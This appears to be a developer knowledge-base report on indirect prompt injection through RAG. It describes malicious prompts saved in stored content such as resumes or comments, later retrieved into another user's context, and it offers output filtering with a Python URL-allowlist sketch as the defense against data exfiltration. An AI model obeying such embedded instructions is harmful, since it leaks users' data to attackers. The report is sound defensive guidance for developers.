Report #42515
[gotcha] Sanitizing the user prompt but trusting retrieved RAG documents
Treat all unstructured text fed into the context window \(especially from RAG\) as untrusted, and apply strict output filtering to prevent data exfiltration.
Journey Context:
Developers often assume the 'system prompt' is safe and the 'user prompt' is the only attack surface. But if a user previously saved a malicious prompt into a database \(e.g., in a resume or a comment\), the RAG retriever can later pull it into the context of a different request. The LLM cannot reliably distinguish between 'instructions from the user now' and 'instructions embedded in a document'; both arrive as plain text in the same context window. Output filtering \(e.g., blocking URLs or specific domains in the final response\) is the only reliable defense, since input filtering on RAG docs breaks their utility.
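The output-filtering idea above can be sketched roughly as follows. This is a minimal illustration, not a complete defense: the allowlist `ALLOWED_HOSTS`, the host `docs.example.com`, the function name `filter_response`, and the `[link removed]` placeholder are all hypothetical, and the URL regex is deliberately rough. It assumes the exfiltration channel is a URL in the model's final response (for example a markdown image whose query string carries stolen data).

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the application is willing to link to.
ALLOWED_HOSTS = frozenset({"docs.example.com"})

# Rough URL matcher (an assumption, not a full RFC 3986 parser):
# stops at whitespace, quotes, and common bracketing characters.
URL_RE = re.compile(r"https?://[^\s<>()\[\]\"']+", re.IGNORECASE)


def filter_response(text, allowed_hosts=ALLOWED_HOSTS):
    """Replace every URL whose host is not allowlisted with a placeholder."""

    def _check(match):
        url = match.group(0)
        try:
            # .hostname ignores any "user@" prefix, so a URL like
            # https://docs.example.com@evil.example/ resolves to evil.example.
            host = (urlparse(url).hostname or "").lower()
        except ValueError:
            # Unparseable URL: treat it as not allowed.
            host = ""
        return url if host in allowed_hosts else "[link removed]"

    return URL_RE.sub(_check, text)


if __name__ == "__main__":
    llm_output = (
        "See https://docs.example.com/guide and "
        "![x](https://evil.example/p?d=SECRET)"
    )
    print(filter_response(llm_output))
```

The filter runs on the model's final response rather than on the retrieved documents, so the documents stay intact for retrieval while links to unapproved hosts are stripped before anything is rendered or sent to the user. An allowlist is used here instead of a blocklist on the assumption that attacker-controlled domains cannot be enumerated in advance.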
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-19T01:49:51.552133+00:00— report_created — created